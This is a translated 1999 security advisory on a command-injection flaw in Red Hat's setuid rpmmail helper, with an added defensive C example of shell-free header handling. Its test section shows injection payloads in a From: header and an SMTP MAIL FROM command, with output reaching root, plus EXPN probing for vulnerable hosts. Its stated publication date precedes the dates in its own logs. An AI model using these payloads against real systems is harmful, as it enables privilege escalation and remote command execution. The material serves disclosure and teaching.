Red Hat 6.0: local/remote vulnerability in the latest rpmmail

Published: 1999-06-19
Updated: 1999-06-19

Affected systems:
Linux
+RedHat 6.0
Description:
The Red Hat 6.0 supplementary CD includes a package called rpmmail. Once installed, rpmmail carries a serious root-level vulnerability: an ordinary remote or local user may gain root privileges, or execute arbitrary commands remotely as "nobody".

Sending an e-mail to rpmmail@vulnerablehost makes /home/rpmmail/rpmmail (installed setuid root by default, and invoked remotely through a .forward file) pass any command you like to system(3). The command does not necessarily run with root privileges, because of how bash handles the case euid != uid of the caller: although system(3) invokes /bin/sh -c, in the default setup of some Linux systems, for example SuSE 6.2, /bin/sh is linked to /bin/bash v2. As the system(3) manual page notes, this vulnerability does not work on systems where /bin/sh is bash version 2, because since version 2 bash drops its special privileges at startup. Some systems with rpmmail installed therefore have a remote/local root vulnerability, and any user with no special privileges (the "others" class) can execute commands remotely.
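The defect described above is the classic one: a header taken from an untrusted message is handed to system(3), so the shell interprets ";" in it as command separators, and only bash 2's privilege-dropping behaviour limits the damage. As an added example, not rpmmail's own code and not part of the original advisory, the C program below shows the safe form of that pattern for a setuid helper: the From: value is extracted, validated against an allowlist, and handed to a notifier program as a single argv element with no shell involved, after the child has permanently dropped to the caller's real uid and gid. The notifier path /bin/echo, the function names and the embedded message are assumptions constructed for illustration.

```c
/* Added example (not rpmmail's code): safe handling of a mail header that a
 * setuid helper must pass to another program. Assumes the helper reads a
 * message on stdin and wants to call a notifier with the sender address. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Allowlist check: only characters of a plain user@host address pass.
 * ';', '|', '`', '$', whitespace and anything else are rejected outright. */
int sender_is_safe(const char *s)
{
    size_t len = strlen(s);
    if (len == 0 || len > 254) return 0;
    for (const char *p = s; *p; p++) {
        if (isalnum((unsigned char)*p)) continue;
        if (strchr("@.-_+", *p)) continue;
        return 0;
    }
    return 1;
}

/* Copy the value of the first "From: " line of msg into out.
 * Returns 1 on success, 0 if the header is absent or does not fit. */
int extract_from(const char *msg, char *out, size_t outlen)
{
    const char *line = msg;
    while (line && *line) {
        if (strncmp(line, "From: ", 6) == 0) {
            const char *v = line + 6;
            size_t n = strcspn(v, "\r\n");      /* stop at end of line */
            if (n + 1 > outlen) return 0;
            memcpy(out, v, n);
            out[n] = '\0';
            return 1;
        }
        line = strchr(line, '\n');
        if (line) line++;                       /* advance to next line */
    }
    return 0;
}

/* Run prog with sender as one argv element. No shell is involved, so shell
 * metacharacters are plain data. The child drops to the real uid/gid before
 * exec, so even a setuid-root parent never runs the notifier as root.
 * Returns the child's exit status, or -1 on rejection or failure. */
int notify_without_shell(const char *prog, const char *sender)
{
    if (!sender_is_safe(sender)) return -1;     /* validate before any use */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* Drop group first, then user; verify the drop actually took. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(126);
        if (geteuid() != getuid() || getegid() != getgid()) _exit(126);
        char *const argv[] = { (char *)prog, (char *)sender, NULL };
        execv(prog, argv);
        _exit(127);                             /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample message mirroring the header shape in the advisory. */
    const char *msg = "Received: from somewhere\nFrom: ;/usr/bin/id;\n\nbody\n";
    char sender[256];
    if (!extract_from(msg, sender, sizeof sender)) return 1;
    /* The injected header is refused; a plain address is passed verbatim. */
    printf("rejected: %d\n", notify_without_shell("/bin/echo", sender));
    printf("accepted: %d\n", notify_without_shell("/bin/echo", "user@example.com"));
    return 0;
}
```

Two properties carry the protection here: the allowlist rejects the header before it reaches any privileged operation, and even an accepted value is never parsed by a shell, so the program no longer depends on which shell /bin/sh points to.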

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

The local vulnerability is shown below:

/bin/sh is linked to /bin/bash (default SuSE 6.2 behavior):
bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 9 Oct 5 11:27 /bin/sh -> /bin/bash
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: command not found
uid=100(xnec) gid=100(users) groups=100(users)
Could not open acknowledge file!
bash-2.03$

----

After linking /bin/sh to /bin/ksh instead:

bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 8 Oct 5 11:09 /bin/sh -> /bin/ksh
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: not found
uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users)
Could not open acknowledge file!
bash-2.03$


The remote vulnerability is shown below:

bash-2.03$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500 (CDT)
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 <rpmmail> ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit

Confirming whether a host has this vulnerability is simple: the EXPN command shows whether the .forward entry exists:

220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:38:44 -0500 (CDT)
EXPN rpmmail
250 "| /home/rpmmail/rpmmail -c /home/rpmmail/rpmmail.conf"



Recommendation:
None available yet

This advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.